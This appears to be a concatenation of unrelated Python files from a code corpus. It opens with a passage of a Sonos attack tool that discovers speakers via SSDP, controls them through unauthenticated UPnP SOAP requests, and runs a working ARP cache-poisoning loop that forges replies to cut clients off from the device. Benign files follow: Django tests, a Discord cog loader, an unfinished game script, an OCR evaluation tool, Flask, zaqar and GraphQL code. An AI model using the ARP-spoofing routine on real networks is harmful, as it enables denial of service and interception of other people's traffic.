    startTime = time.time()
    responses = []
    # While the current time is smaller than startTime + 3 seconds
    # (i.e. as long as no more than 3 seconds since start have elapsed)
    while (time.time() < startTime + 3):
        # Poll the socket; times out after 1 second so the outer loop
        # re-checks the 3-second deadline regularly.
        recvReady, _, _ = select.select([sock], [], [], 1) # Timeout after 1 second
        # Fetch received messages
        for s in recvReady:
            # We got no clue how big the message will be, read max size.
            data, addr = s.recvfrom(65535)
            # Add the (data, addr) tuple to the responses
            responses.append((data, addr))
            logging.debug(f"Packet from {str(addr)}:\n {str(data.decode('utf-8'))}\n")
    logging.debug(f"Found {str(len(responses))} devices responding to SSDP on network.")
    # Now we've aggregated all responses, we should still filter out the sonos devices.
    # There could be other kinds of devices responding to multicast packets.
    devices = filterAndGetSonosDevices(responses)
    logging.debug(f"Found {str(len(devices))} Sonos devices on network.")
    return devices
def setVolume(ip, level):
    # Sets the volume of the device at specified IP to the provided level.
    # Issues a UPnP SOAP POST against the device's RenderingControl service
    # (plain HTTP on port 1400); the XML payload must match exactly.
    headers = {
        "SOAPACTION": "urn:schemas-upnp-org:service:RenderingControl:1#SetVolume",
        "CONTENT-TYPE": "text/xml; charset=\"utf-8\""
    }
    method = "POST"
    url = f"http://{ip}:1400/MediaRenderer/RenderingControl/Control"
    data = ("<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" +
            "<s:Body><u:SetVolume xmlns:u=\"urn:schemas-upnp-org:service:RenderingControl:1\"><InstanceID>0</InstanceID>" +
            f"<Channel>Master</Channel><DesiredVolume>{level}</DesiredVolume></u:SetVolume></s:Body></s:Envelope>").encode("utf-8")
    req = request.Request(url=url, data=data, headers=headers, method=method)
    logging.debug(f"Sending volume change request")
    request.urlopen(req)
def playNext(ip):
    """Skip to the next track on the Sonos device at *ip* (AVTransport#Next)."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    soap_headers = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Next",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"'
    }
    body = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"'
        ' s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Next xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Next></s:Body></s:Envelope>'
    ).encode("utf-8")
    soap_request = request.Request(
        url=endpoint, data=body, headers=soap_headers, method="POST")
    logging.debug("Sending play next request")
    request.urlopen(soap_request)
def playPrevious(ip):
    """Jump back to the previous track on the Sonos device at *ip*
    (AVTransport#Previous)."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    soap_headers = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Previous",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"'
    }
    body = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"'
        ' s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Previous xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Previous></s:Body></s:Envelope>'
    ).encode("utf-8")
    soap_request = request.Request(
        url=endpoint, data=body, headers=soap_headers, method="POST")
    logging.debug("Sending play previous request")
    request.urlopen(soap_request)
def pauseMusic(ip):
    """Pause playback on the Sonos device at *ip* (AVTransport#Pause)."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    soap_headers = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Pause",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"'
    }
    body = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"'
        ' s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Pause xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID></u:Pause></s:Body></s:Envelope>'
    ).encode("utf-8")
    soap_request = request.Request(
        url=endpoint, data=body, headers=soap_headers, method="POST")
    logging.debug("Sending pause request")
    request.urlopen(soap_request)
def playMusic(ip):
    """Resume/start playback on the Sonos device at *ip* (AVTransport#Play)."""
    endpoint = f"http://{ip}:1400/MediaRenderer/AVTransport/Control"
    soap_headers = {
        "SOAPACTION": "urn:schemas-upnp-org:service:AVTransport:1#Play",
        "CONTENT-TYPE": 'text/xml; charset="utf-8"'
    }
    body = (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"'
        ' s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:Play xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">'
        '<InstanceID>0</InstanceID><Speed>1</Speed></u:Play></s:Body></s:Envelope>'
    ).encode("utf-8")
    soap_request = request.Request(
        url=endpoint, data=body, headers=soap_headers, method="POST")
    logging.debug("Performing HTTP request to play music")
    request.urlopen(soap_request)
def createArpPacket(attackerMac, victimMac, victimIp, ipToSpoof):
    # Forges an ARP packet to achieve redirection of traffic to the ipToSpoof
    # to the attackerMac, addressed to the victim.
    # The frame claims "ipToSpoof is at attackerMac", so the victim's ARP
    # cache will route traffic destined for ipToSpoof to the attacker.
    # NOTE(review): the ARP opcode is left at scapy's default — confirm that
    # the default opcode is the one intended for cache poisoning here.
    arp = Ether() / ARP()
    arp[Ether].src = attackerMac  # Ethernet source: attacker's MAC
    arp[ARP].hwsrc = attackerMac  # ARP sender hardware address: attacker's MAC
    arp[ARP].psrc = ipToSpoof     # ARP sender protocol address: impersonated IP
    arp[ARP].hwdst = victimMac    # deliver directly to the victim's MAC
    arp[ARP].pdst = victimIp      # ...and the victim's IP
    return arp
def arpFilterAndPoison(packet):
    """Sniff callback: react to interesting ARP "who-has" requests.

    An ARP packet is interesting when it either tries to resolve the Sonos
    device's address (we then record the asker as a client and poison it),
    or when the Sonos device tries to resolve a known client's address
    (we then poison the Sonos device).  Packets we sent ourselves and
    non-request ARP operations are ignored.

    Relies on the module-level globals ``macSelf``, ``ipSonos`` and
    ``clientList`` being set up before sniffing starts.

    Fixes over the original:
    - the debug log reported ``pdst`` (the Sonos IP itself) instead of the
      asking host's ``psrc``;
    - ``clientList`` no longer accumulates duplicate entries;
    - the triplicated ``sendp`` calls are collapsed into a loop.
    """
    # If the sniffed packet originated from ourself, return (skip).
    if packet[Ether].src == macSelf:
        return
    # Only ARP requests ("who-has", op == 1) are of interest.
    if packet[ARP].op != 1:
        return
    # If someone asked for the Sonos device's IP, then:
    # (The second comparison avoids listing the Sonos device as a client
    # of itself when it performs gratuitous ARP announcements.)
    if (packet[ARP].pdst == ipSonos) and (packet[ARP].psrc != ipSonos):
        logging.debug(f"IP {packet[ARP].psrc} asked for Sonos device IP")
        victimMac = packet[ARP].hwsrc
        victimIp = packet[ARP].psrc
        arpPacket = createArpPacket(macSelf, victimMac, victimIp, ipSonos)
        # Remember the client so we also hijack traffic when the Sonos
        # device later tries to contact it.  Avoid duplicate entries.
        if victimIp not in clientList:
            logging.debug(f"Add victimIP '{victimIp}' to client list")
            clientList.append(victimIp)
        # Send it a couple of times to make sure we win the race
        for _ in range(3):
            sendp([arpPacket], loop=0)
    # If the Sonos device asked for a client device's IP, then:
    elif (packet[ARP].pdst in clientList) and (packet[ARP].psrc == ipSonos):
        logging.debug(f"IP {packet[ARP].pdst} found in clientlist.")
        arpPacket = createArpPacket(
            macSelf, packet[ARP].hwsrc, ipSonos, packet[ARP].pdst)
        # Send it a couple of times to make sure we win the race
        for _ in range(3):
            sendp([arpPacket], loop=0)
# If the discover flag was set, start discovery.
# NOTE(review): 'arguments' (parsed CLI args), 'discovery', 'get_mac_address'
# and 'sniff' are defined earlier in this file or its imports — confirm.
if arguments.command == "discover":
    logging.debug("Starting discovery")
    devices = discovery()
    logging.info("Address \t\t Server version \t\t\t\t Location\n")
    for dev in devices:
        logging.info(f"{dev.ip} \t\t {dev.serverVersion} \t {dev.descriptionLocation}")
    exit()
elif arguments.command == "control":
    ip = arguments.address
    if arguments.action == "volume":
        # If the provided level is outside 0-99 range, snap it to closest (0 or 99)
        level = max(min(99, arguments.level),0)
        logging.debug(f"Changing volume to {level}")
        setVolume(ip, level)
        logging.info(f"Changed volume to {level}")
    elif arguments.action == "next":
        logging.debug("Play next song")
        playNext(ip)
        logging.info("Playing next song")
    elif arguments.action == "previous":
        logging.debug("Play previous song")
        playPrevious(ip)
        logging.info("Playing previous song")
    elif arguments.action == "pause":
        logging.debug("Pause music")
        pauseMusic(ip)
        logging.info("Paused music")
    elif arguments.action == "play":
        logging.debug("Play music")
        playMusic(ip)
        logging.info("Playing music")
# If the arp poisoning option was specified, go into an indefinite sniffing loop now
if arguments.interface:
    logging.info("Performing ARP poisoning from/to sonos device, obstructing clients to communicate with it")
    snif_interface = arguments.interface
    macSelf = get_mac_address(interface=snif_interface)
    ipSonos = arguments.address
    # Start sniffing for arp packets
    # See arpFilterAndPoison() for additional explanation
    # count=0 sniffs indefinitely; every ARP frame is handed to the callback.
    arpPackets = sniff(count=0, filter="arp", prn=lambda x: arpFilterAndPoison(x))
| StarcoderdataPython |
8102756 | <reponame>Xowap/pylesswrap
# vim: fileencoding=utf-8 tw=100 expandtab ts=4 sw=4 :
#
# pylesswrap
# (c) 2014 <NAME> <<EMAIL>>
#
# This work is free. You can redistribute it and/or modify it under the
# terms of the Do What The Fuck You Want To Public License, Version 2,
# as published by Sam Hocevar. See the COPYING file for more details.
# The whole test module is wrapped in try/except ImportError so the suite
# degrades to a no-op when Django (an optional dependency) is not installed.
try:
    from django.conf import settings
    from django.contrib.staticfiles.finders import get_finder
    from django.test import TestCase
    from pylesswrap.django_finders import FileSystemFinderDirs, AppDirectoriesFinderDirs, list_dirs
    class TestDjangoFinders(TestCase):
        """Tests for pylesswrap's Django static-file finder adapters."""
        def test_file_system_finder(self):
            # FileSystemFinderDirs must expose exactly the configured STATICFILES_DIRS.
            finder = get_finder('django.contrib.staticfiles.finders.FileSystemFinder')
            dirs = FileSystemFinderDirs(finder)
            self.assertEqual(set(str(x) for x in settings.STATICFILES_DIRS), set(dirs.list_paths()))
        def test_app_directory_finder(self):
            finder = get_finder('django.contrib.staticfiles.finders.AppDirectoriesFinder')
            dirs = AppDirectoriesFinderDirs(finder)
            # This ain't no real test, whatever
            self.assertTrue(len(dirs.list_paths()) > 0)
        def test_list_dirs(self):
            dirs = set(list_dirs())
            # This ain't no real test, whatever
            self.assertTrue(len(dirs) > 0)
except ImportError:
    pass
| StarcoderdataPython |
11354173 | from .join import Join
from .quit import Quit
from .time import Time
from .stats import Stats
from .start import Start
from .notify import Notify
from .wins import Wins
from .top import Top
def setup(client):
    """Extension entry point: register every cog in this package on *client*.

    Registration order matches the original explicit call sequence.
    """
    for cog_cls in (Join, Quit, Time, Stats, Start, Notify, Wins, Top):
        client.add_cog(cog_cls(client))
| StarcoderdataPython |
3295816 | import json
from random import *
# Load the game data (professions/buildings with their people and items)
# shipped alongside the script as JSON.
with open("data.json", "r") as myfile:
    data = myfile.read()
data = json.loads(data)
# Flat pool of every item across all buildings; filled by updateItems().
items = []
def updateItems():
    """Rebuild the module-level ``items`` list as a flat list of every item
    offered by every profession/building in ``data``.

    Replaces the original manual index-walking while-loop, which raised an
    IndexError whenever a profession had an empty ``items`` list; the
    flattening order (building by building, item by item) is unchanged.
    """
    global items
    items = [item
             for proffesion in data["proffesions"]
             for item in proffesion["items"]]
# Populate the flattened item pool once at import time.
updateItems()
def Bindex(building):
    """Return the index of *building* inside ``data["proffesions"]``.

    Returns ``None`` when the building is unknown.  The original open-coded
    ``while True`` loop had a dead ``break`` (placed after ``return``) and
    raised IndexError instead of terminating when the building was absent.
    """
    for idx, proffesion in enumerate(data["proffesions"]):
        if proffesion["building"] == building:
            return idx
    return None
def moneyCalculate(cp):
    """Convert a copper-piece amount *cp* into a money value.

    The original implementation was left unfinished: a bare ``elif cp <=``
    was a SyntaxError that broke the entire module on import.  Behavior for
    ``cp <= 10`` (return the value unchanged) is preserved; larger amounts
    are returned as-is until the intended denomination breakdown (the
    unused ``re`` list hinted at one) is implemented.
    """
    if cp <= 10:
        return cp
    # TODO: implement the intended breakdown into denominations for cp > 10;
    # for now the raw value is passed through so the module stays importable.
    return cp
def charectorGen():
    """Generate a random character: a building, a job there, and 1-5 items.

    Fixes the original ``randint(0, len(seq))`` indexing: ``randint``'s
    upper bound is inclusive, so every such call could raise IndexError.
    ``random.choice`` is used instead.  The unused ``money`` local from the
    original has been dropped (it was never stored on the character).
    """
    charector = {}
    # "riches" controls how many items the character owns (1-5 inclusive).
    riches = randint(1, 5)
    proffesion = choice(data["proffesions"])
    charector["building"] = proffesion["building"]
    charector["job"] = choice(proffesion["people"])
    # Items are drawn from the global flattened pool built by updateItems().
    charector["items"] = [choice(items) for _ in range(riches)]
    return charector
# Script entry: refresh the item pool, then print one random character.
updateItems()
print(charectorGen())
| StarcoderdataPython |
3311249 | from argparse import ArgumentParser
import os
import json
import numpy as np
from google.protobuf import json_format
from calamari_ocr.utils import glob_all, split_all_ext
from calamari_ocr.ocr import Evaluator
from calamari_ocr.ocr.datasets import create_dataset, DataSetType, DataSetMode
from calamari_ocr.proto import CheckpointParams
from calamari_ocr.ocr.text_processing import text_processor_from_proto
def print_confusions(r, n_confusions):
    """Print the most frequent ground-truth/prediction confusions.

    Shows at most *n_confusions* entries (``-1`` means all), most frequent
    first, followed by the share of errors the hidden remainder makes up.
    Prints nothing when *n_confusions* is 0 or there are no sync errors.
    """
    if n_confusions == 0 or r["total_sync_errs"] <= 0:
        return
    # Rank confusion pairs by descending count.
    ranked = sorted(r['confusion'].items(), key=lambda entry: -entry[1])
    print("{:8s} {:8s} {:8s} {:10s}".format("GT", "PRED", "COUNT", "PERCENT"))
    shown_percent = 0
    for rank, ((gt, pred), count) in enumerate(ranked):
        if rank == n_confusions:
            break
        share = count * max(len(gt), len(pred)) / r["total_sync_errs"]
        print("{:8s} {:8s} {:8d} {:10.2%}".format(
            "{" + gt + "}", "{" + pred + "}", count, share))
        shown_percent += share
    print("The remaining but hidden errors make up {:.2%}".format(1.0 - shown_percent))
def print_worst_lines(r, gt_samples, n_worst_lines):
    """Print the *n_worst_lines* samples with the most recognition errors.

    A negative *n_worst_lines* prints every line; 0 prints nothing.
    Raises Exception when predictions and gt samples differ in count.
    """
    if len(r["single"]) != len(gt_samples):
        raise Exception("Mismatch in number of predictions and gt files")
    # Pair each per-line result with its sample, most errors first.
    ranked = sorted(zip(r["single"], gt_samples), key=lambda pair: -pair[0][1])
    limit = len(gt_samples) if n_worst_lines < 0 else n_worst_lines
    if limit <= 0:
        return
    print("{:60s} {:4s} {:3s} {:3s} {}".format("GT FILE", "LEN", "ERR", "SER", "CONFUSIONS"))
    for (len_gt, errs, sync_errs, confusion, gt_pred), sample in ranked[:limit]:
        print("{:60s} {:4d} {:3d} {:3d} {}".format(
            sample['id'][-60:], len_gt, errs, sync_errs, confusion))
def write_xlsx(xlsx_file, eval_datas):
    """Write evaluation results to *xlsx_file* as an Excel workbook.

    For every entry of *eval_datas* (dicts with keys "prefix", "results"
    and "gt_files") three worksheets are produced: per-line results
    (worst lines first), global confusions, and a CER histogram with an
    embedded column chart.
    """
    print("Writing xlsx file to {}".format(xlsx_file))
    import xlsxwriter
    workbook = xlsxwriter.Workbook(xlsx_file)
    for eval_data in eval_datas:
        prefix = eval_data["prefix"]
        r = eval_data["results"]
        gt_files = eval_data["gt_files"]
        # all files
        ws = workbook.add_worksheet("{} - per line".format(prefix))
        for i, heading in enumerate(["GT FILE", "GT", "PRED", "LEN", "ERR", "CER", "REL. ERR", "SYNC ERR", "CONFUSIONS"]):
            ws.write(0, i, heading)
        # Rank lines by error count, descending (worst first).
        sorted_lines = sorted(zip(r["single"], gt_files), key=lambda a: -a[0][1])
        all_cs = []
        for i, ((len_gt, errs, sync_errs, confusion, (gt, pred)), gt_file) in enumerate(sorted_lines):
            ws.write(i + 1, 0, gt_file)
            ws.write(i + 1, 1, gt.strip())
            ws.write(i + 1, 2, pred.strip())
            ws.write(i + 1, 3, len_gt)
            ws.write(i + 1, 4, errs)
            ws.write(i + 1, 5, errs / max(len(gt), len(pred)))
            ws.write(i + 1, 6, errs / r["total_char_errs"] if r["total_char_errs"] > 0 else 0)
            ws.write(i + 1, 7, sync_errs)
            ws.write(i + 1, 8, "{}".format(confusion))
            all_cs.append(errs / max(len(gt), len(pred)))
        # total confusions
        ws = workbook.add_worksheet("{} - global".format(prefix))
        for i, heading in enumerate(["GT", "PRED", "COUNT", "PERCENT"]):
            ws.write(0, i, heading)
        keys = sorted(r['confusion'].items(), key=lambda item: -item[1])
        for i, ((gt, pred), count) in enumerate(keys):
            gt_fmt = "{" + gt + "}"
            pred_fmt = "{" + pred + "}"
            percent = count * max(len(gt), len(pred)) / r["total_sync_errs"]
            ws.write(i + 1, 0, gt_fmt)
            ws.write(i + 1, 1, pred_fmt)
            ws.write(i + 1, 2, count)
            ws.write(i + 1, 3, percent)
        # histogram of cers
        hsl = "{} - histogram".format(prefix)
        ws = workbook.add_worksheet(hsl)
        ws.write_row("A1", ["Class", "Count"])
        hist, bin_edges = np.histogram(all_cs, bins="auto")
        ws.write_column("A2", bin_edges)
        ws.write_column("B2", hist)
        chart = workbook.add_chart({'type': 'column'})
        chart.add_series({'name': "CER hist",
                          'categories': "='{}'!$A$2:$A${}".format(hsl, 2 + len(bin_edges)),
                          'values': "='{}'!$B$2:$B${}".format(hsl, 2 + len(bin_edges))
                          })
        chart.set_title({'name': 'CER distribution'})
        chart.set_x_axis({'name': 'CER'})
        chart.set_y_axis({'name': 'Amount'})
        ws.insert_chart("D2", chart, {"x_offset": 25, 'y_offset': 10})
    workbook.close()
def main():
    """CLI entry point: evaluate predicted text files against ground truth.

    Resolves ground-truth and prediction files, optionally loads all
    parameters from a single JSON file, runs the Evaluator, prints the
    aggregate label error rate plus confusion/worst-line reports, and can
    export the results to an xlsx workbook.
    """
    parser = ArgumentParser()
    parser.add_argument("--dataset", type=DataSetType.from_string, choices=list(DataSetType), default=DataSetType.FILE)
    parser.add_argument("--gt", nargs="+", required=True,
                        help="Ground truth files (.gt.txt extension). "
                             "Optionally, you can pass a single json file defining all parameters.")
    parser.add_argument("--pred", nargs="+", default=None,
                        help="Prediction files if provided. Else files with .pred.txt are expected at the same "
                             "location as the gt.")
    parser.add_argument("--pred_dataset", type=DataSetType.from_string, choices=list(DataSetType), default=DataSetType.FILE)
    parser.add_argument("--pred_ext", type=str, default=".pred.txt",
                        help="Extension of the predicted text files")
    parser.add_argument("--n_confusions", type=int, default=10,
                        help="Only print n most common confusions. Defaults to 10, use -1 for all.")
    parser.add_argument("--n_worst_lines", type=int, default=0,
                        help="Print the n worst recognized text lines with its error")
    parser.add_argument("--xlsx_output", type=str,
                        help="Optionally write a xlsx file with the evaluation results")
    parser.add_argument("--num_threads", type=int, default=1,
                        help="Number of threads to use for evaluation")
    parser.add_argument("--non_existing_file_handling_mode", type=str, default="error",
                        help="How to handle non existing .pred.txt files. Possible modes: skip, empty, error. "
                             "'Skip' will simply skip the evaluation of that file (not counting it to errors). "
                             "'Empty' will handle this file as would it be empty (fully checking for errors)."
                             "'Error' will throw an exception if a file is not existing. This is the default behaviour.")
    parser.add_argument("--skip_empty_gt", action="store_true", default=False,
                        help="Ignore lines of the gt that are empty.")
    parser.add_argument("--no_progress_bars", action="store_true",
                        help="Do not show any progress bars")
    parser.add_argument("--checkpoint", type=str, default=None,
                        help="Specify an optional checkpoint to parse the text preprocessor (for the gt txt files)")
    # page xml specific args
    parser.add_argument("--pagexml_gt_text_index", default=0)
    parser.add_argument("--pagexml_pred_text_index", default=1)
    args = parser.parse_args()
    # A single JSON file passed as --gt defines all parameters instead.
    if len(args.gt) == 1 and args.gt[0].endswith("json"):
        with open(args.gt[0], 'r') as f:
            json_args = json.load(f)
        for key, value in json_args.items():
            setattr(args, key, value)
    print("Resolving files")
    gt_files = sorted(glob_all(args.gt))
    if args.pred:
        pred_files = sorted(glob_all(args.pred))
    else:
        # Derive prediction paths from the gt paths; datasets then match.
        pred_files = [split_all_ext(gt)[0] + args.pred_ext for gt in gt_files]
        args.pred_dataset = args.dataset
    if args.non_existing_file_handling_mode.lower() == "skip":
        # Drop gt/pred pairs whose prediction file is missing.
        non_existing_pred = [p for p in pred_files if not os.path.exists(p)]
        for f in non_existing_pred:
            idx = pred_files.index(f)
            del pred_files[idx]
            del gt_files[idx]
    text_preproc = None
    if args.checkpoint:
        with open(args.checkpoint if args.checkpoint.endswith(".json") else args.checkpoint + '.json', 'r') as f:
            checkpoint_params = json_format.Parse(f.read(), CheckpointParams())
        text_preproc = text_processor_from_proto(checkpoint_params.model.text_preprocessor)
    # BUGFIX: the original compared against "error " (trailing space), so
    # mode "error" was never recognized and missing prediction files were
    # silently treated as empty instead of raising.
    non_existing_as_empty = args.non_existing_file_handling_mode.lower() != "error"
    gt_data_set = create_dataset(
        args.dataset,
        DataSetMode.EVAL,
        texts=gt_files,
        non_existing_as_empty=non_existing_as_empty,
        args={'text_index': args.pagexml_gt_text_index},
    )
    pred_data_set = create_dataset(
        args.pred_dataset,
        DataSetMode.EVAL,
        texts=pred_files,
        non_existing_as_empty=non_existing_as_empty,
        args={'text_index': args.pagexml_pred_text_index},
    )
    evaluator = Evaluator(text_preprocessor=text_preproc, skip_empty_gt=args.skip_empty_gt)
    r = evaluator.run(gt_dataset=gt_data_set, pred_dataset=pred_data_set, processes=args.num_threads,
                      progress_bar=not args.no_progress_bars)
    # TODO: More output
    print("Evaluation result")
    print("=================")
    print("")
    print("Got mean normalized label error rate of {:.2%} ({} errs, {} total chars, {} sync errs)".format(
        r["avg_ler"], r["total_char_errs"], r["total_chars"], r["total_sync_errs"]))
    # sort descending
    print_confusions(r, args.n_confusions)
    print_worst_lines(r, gt_data_set.samples(), args.n_worst_lines)
    if args.xlsx_output:
        write_xlsx(args.xlsx_output,
                   [{
                       "prefix": "evaluation",
                       "results": r,
                       "gt_files": gt_files,
                   }])
if __name__ == '__main__':
    main()
| StarcoderdataPython |
11371298 | """
Animation Resource
Description:
This resource will house the requests to create and retrieve video animations.
"""
from io import BytesIO
from flask import send_file
from flask_restx import Resource, reqparse
from werkzeug.datastructures import FileStorage
from saturn.apis import api
from saturn.common import animation
# Multipart request parser: the audio and image uploads are mandatory,
# the title string is optional.
parser = reqparse.RequestParser()
parser.add_argument(
    'audio', location='files', type=FileStorage, required=True)
parser.add_argument(
    'image', location='files', type=FileStorage, required=True)
parser.add_argument(
    'title', type=str, required=False)
@api.expect(parser)
class Animate(Resource):
    """REST resource that renders an audio-spectrum animation video."""
    def post(self):
        """
        Create spectrum animation provided audio and image files.
        """
        args = parser.parse_args()
        print(args)
        # Render the animation; the helper writes "output.mp4" to disk
        # (hard-coded path, see animation.create_animation).
        animation.create_animation(
            args["audio"], args["image"], args["title"])
        # Read the rendered file back with a context manager so the file
        # handle is closed (the original open(...).read() leaked it).  A
        # stray dataset artifact that trailed the final line was removed.
        with open("output.mp4", "rb") as rendered:
            payload = rendered.read()
        return send_file(
            BytesIO(payload),
            as_attachment=True,
            attachment_filename="animation.mp4")
3203239 | <filename>tests/data/test_activate_mixin.py
import unittest
from rastervision.data import (ActivateMixin, ActivationError)
class TestActivateMixin(unittest.TestCase):
    """Tests for ActivateMixin's activate() context-manager behaviour."""
    class Foo(ActivateMixin):
        # Minimal component: just records whether it is currently activated.
        def __init__(self):
            self.activated = False
        def _activate(self):
            self.activated = True
        def _deactivate(self):
            self.activated = False
    class Bar(ActivateMixin):
        # Component owning a Foo subcomponent that must be activated and
        # deactivated together with it.
        def __init__(self):
            self.activated = False
            self.foo = TestActivateMixin.Foo()
        def _activate(self):
            self.activated = True
        def _deactivate(self):
            self.activated = False
        def _subcomponents_to_activate(self):
            return [self.foo]
    def test_activates_and_deactivates(self):
        """Entering/leaving activate() toggles the activated flag."""
        foo = TestActivateMixin.Foo()
        self.assertFalse(foo.activated)
        with foo.activate():
            self.assertTrue(foo.activated)
        self.assertFalse(foo.activated)
    def test_activated_and_deactivates_subcomponents(self):
        """Subcomponents are (de)activated together with their owner."""
        bar = TestActivateMixin.Bar()
        self.assertFalse(bar.activated)
        self.assertFalse(bar.foo.activated)
        with bar.activate():
            self.assertTrue(bar.activated)
            self.assertTrue(bar.foo.activated)
        self.assertFalse(bar.activated)
        self.assertFalse(bar.foo.activated)
    def test_no_activate_twice(self):
        """Nested activation raises ActivationError and leaves it deactivated."""
        bar = TestActivateMixin.Bar()
        with self.assertRaises(ActivationError):
            with bar.activate():
                with bar.activate():
                    pass
        self.assertFalse(bar.activated)
| StarcoderdataPython |
# Read the list length N and the number of queries Q from stdin.
# NOTE: N is read for input-format compliance but not otherwise used.
N, Q = map(int, input().split())
acorns = list(map(int, input().split()))
for i in range(Q):
    # Each query sorts the 1-based inclusive sub-range [l, r]:
    # t == 1 -> ascending, otherwise descending.
    t, l, r = map(int, input().split())
    if t == 1:
        acorns[l-1:r] = list(sorted(acorns[l-1:r]))
    else:
        acorns[l-1:r] = list(sorted(acorns[l-1:r], reverse=True))
print(*acorns)
| StarcoderdataPython |
3312014 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from oslo_cache import core as cache
from oslo_config import cfg
from oslo_log import log
from zaqar.conf import default
from zaqar.conf import drivers
from zaqar.conf import drivers_management_store_mongodb
from zaqar.conf import drivers_management_store_redis
from zaqar.conf import drivers_management_store_sqlalchemy
from zaqar.conf import drivers_message_store_mongodb
from zaqar.conf import drivers_message_store_redis
from zaqar.conf import drivers_message_store_swift
from zaqar.conf import drivers_transport_websocket
from zaqar.conf import drivers_transport_wsgi
from zaqar.conf import notification
from zaqar.conf import pooling_catalog
from zaqar.conf import profiler
from zaqar.conf import signed_url
from zaqar.conf import storage
from zaqar.conf import transport
CONF = cfg.CONF
# Every option module shipped with zaqar; configure() iterates this list
# and registers each module's options on the target config object.
conf_modules = [
    default,
    drivers,
    drivers_management_store_mongodb,
    drivers_management_store_redis,
    drivers_management_store_sqlalchemy,
    drivers_message_store_mongodb,
    drivers_message_store_redis,
    drivers_message_store_swift,
    drivers_transport_websocket,
    drivers_transport_wsgi,
    notification,
    pooling_catalog,
    profiler,
    signed_url,
    storage,
    transport
]
def setup_logging():
    """Set up logging for the zaqar package."""
    # (The original docstring said "keystone" — a copy-paste leftover.)
    log.setup(CONF, 'zaqar')
    # Route warnings.warn() messages through the logging system as well.
    logging.captureWarnings(True)
def configure(conf=None):
    """Register every zaqar option module (plus oslo.cache options) on
    *conf*, defaulting to the global CONF object when None is given."""
    target_conf = CONF if conf is None else conf
    for opt_module in conf_modules:
        opt_module.register_opts(target_conf)
    # add oslo.cache related config options
    cache.configure(target_conf)
| StarcoderdataPython |
8123680 | <gh_stars>0
from typing import Union, Dict
from asyncpg import Record
from asyncpgsa import PG
from graphene.types import ResolveInfo
from graphql.language.ast import InlineFragment
from sqlalchemy import and_
from .base import PROJECTS_REQUIRED_FIELDS, format_project_type
from tracker.api.errors import APIException
from tracker.api.services.roles import ROLES_REQUIRED_FIELDS
from tracker.api.status_codes import StatusEnum
from tracker.db.schema import roles_table, projects_table
def check_role_requested_in_node(info: ResolveInfo) -> bool:
    '''
    Return True when the GraphQL query requests the current user's role,
    i.e. contains a 'myRole' field inside a ProjectType inline fragment.
    '''
    for fragment in info.field_asts[0].selection_set.selections:
        if not isinstance(fragment, InlineFragment):
            continue
        if fragment.type_condition.name.value != 'ProjectType':
            continue
        for requested in fragment.selection_set.selections:
            if requested.name.value == 'myRole':
                return True
    return False
async def get_user_project_role(
        db: PG, project_id: int, user_id: int
) -> Record:
    '''Get role with given user id and project id. If not raise 403'''
    roles_fields = ROLES_REQUIRED_FIELDS.copy()
    # Relabel the first column as 'role_id' — presumably to avoid a name
    # clash when the role record is merged with a project record; confirm.
    roles_fields[0] = roles_fields[0].label('role_id')
    # Only non-deleted role rows for this (user, project) pair qualify.
    query = roles_table.\
        select().\
        with_only_columns(roles_fields).\
        where(and_(
            roles_table.c.user_id == user_id,
            roles_table.c.project_id == project_id,
            roles_table.c.is_deleted.is_(False)
        ))
    record = await db.fetchrow(query)
    if not record:
        # No membership row -> the user may not access this project.
        raise APIException(
            'You are not a member of this project.',
            status=StatusEnum.FORBIDDEN.name
        )
    return record
async def get_project_node(
    db: PG,
    info: ResolveInfo,
    project_id: int,
    user_id: int
) -> Union[Dict, None]:
    '''
    Get a project with given id.
    Raise 403 if user is not member of this project
    '''
    query = projects_table.\
        select().\
        with_only_columns([
            *PROJECTS_REQUIRED_FIELDS,
        ]).\
        where(and_(
            projects_table.c.id == project_id,
            projects_table.c.is_deleted.is_(False)
        ))
    project = await db.fetchrow(query)
    if not project:
        # Unknown or soft-deleted project.
        return None
    # Skip the role lookup (an extra query) when the GraphQL query did not
    # request the 'myRole' field.
    if not check_role_requested_in_node(info):
        return dict(project)
    role = await get_user_project_role(db, project_id, user_id)
    result = format_project_type({**project, **role})
    return result
| StarcoderdataPython |
4808673 | import numpy as np
import os,sys,subprocess
from pandas import *
CSPEC='SO2 SO4 NOX HNO3 NO3 PMS1 PMS2 PMS3'.split()
# Read every concrec*.dat file name from the directory; the names encode a
# species x time matrix (species index and hour index embedded in the name).
